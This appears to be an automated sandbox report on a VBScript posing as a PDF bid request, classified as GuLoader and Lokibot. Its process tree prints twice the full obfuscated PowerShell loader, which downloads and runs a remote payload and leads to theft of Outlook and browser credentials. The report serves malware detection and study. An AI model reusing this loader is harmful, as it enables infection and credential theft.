Overview

overview

10

Static

static

1

BID REQUES...df.vbs

windows7-x64

10

BID REQUES...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    09-09-2024 19:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BID REQUEST 09-09-2024·pdf.vbs

  • Size

    28KB

  • MD5

    3cc67d448a578ff541499696264c340a

  • SHA1

    7bac2915c8f873a8f27c40ba197854ab0417b4e3

  • SHA256

    c26253cd77cc444cdbf4d0cb2abb2aab166485f749777677ea749d4f850fc859

  • SHA512

    74adc64258c27028ca5c340cb1a2323a88c887d43310feef908bcbb59c80d055173fa747db0349c939c386f0dba3fd0cb40754092eee1c46a75375d011cb0664

  • SSDEEP

    384:1qh1bFGXrSOQ6aY2/w1MpmQkH13hhX7wc:1qhtkrPfaY2/w1MpzkVxhLH

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderexecutionspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
        3⤵
          PID:2660
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2216
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2092
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Accesses Microsoft Outlook profiles
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2780

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      c790bcec6427196cca8456a5b1a49079

      SHA1

      3017bf045ad2a9e9aae55ad3068a61ca02560fe5

      SHA256

      a98e8d1290535bda036224cadfe388d7dc62a49e3f0e08f7dd0f524f886ad413

      SHA512

      f2ab548a685e42d571ea6dde413ca34ed6db61de0ad145b4df87e390b25363d0f05fd851740c4fd3ccc4c2774f82a49d25c8e2c8c75077d49cc94f6964f64a7f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab780F.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar10D3.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Carbines.Que
      Filesize

      421KB

      MD5

      fed7d2b1a62075a148249e5d86063b30

      SHA1

      f2e3c9605313437d6dc1668982f8d8c21d42d75d

      SHA256

      c31da00f237eeb4bc98b2d1396d5bdb56c51c18d4ede431dcd6049e4a78f18ba

      SHA512

      66f6fa6b5af2c09bee449cc9560194fa82a23affc4c90e2e3698458fab319a50163f5b581e8ff734dd7de6d0a12151d10c0b6011f3346f6568becc6707675450

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OEV9XBIIGR3TUWYFZ422.temp
      Filesize

      7KB

      MD5

      2488869d637c1979b85bc2adf1a09838

      SHA1

      5873bd01769014537e1f431166a56c9343d16482

      SHA256

      3ca1bafa69f871eeb5bd84f75c9cebeb2b36dd1a6f4b3294c2ae6239b89d7f2c

      SHA512

      f0c13acf7a93b6760b3033cbad522e66b44f4ba05d1bbffa6bb3113b4397612661d585297e364679f516ca178f911152bd727b34d62f30d3f96e8fbb920bc13a

      Download Submit

    • memory/2216-36-0x00000000066B0000-0x000000000A21E000-memory.dmp

      Filesize

      59.4MB

      Download

    • memory/2616-25-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2616-21-0x000000001B600000-0x000000001B8E2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2616-27-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2616-28-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2616-30-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2616-31-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2616-24-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2616-26-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2616-22-0x0000000002820000-0x0000000002828000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2616-23-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2616-20-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2616-62-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2780-61-0x0000000000AF0000-0x000000000465E000-memory.dmp

      Filesize

      59.4MB

      Download

    • memory/2780-60-0x0000000000400000-0x0000000000581000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/2780-70-0x0000000000AF0000-0x000000000465E000-memory.dmp

      Filesize

      59.4MB

      Download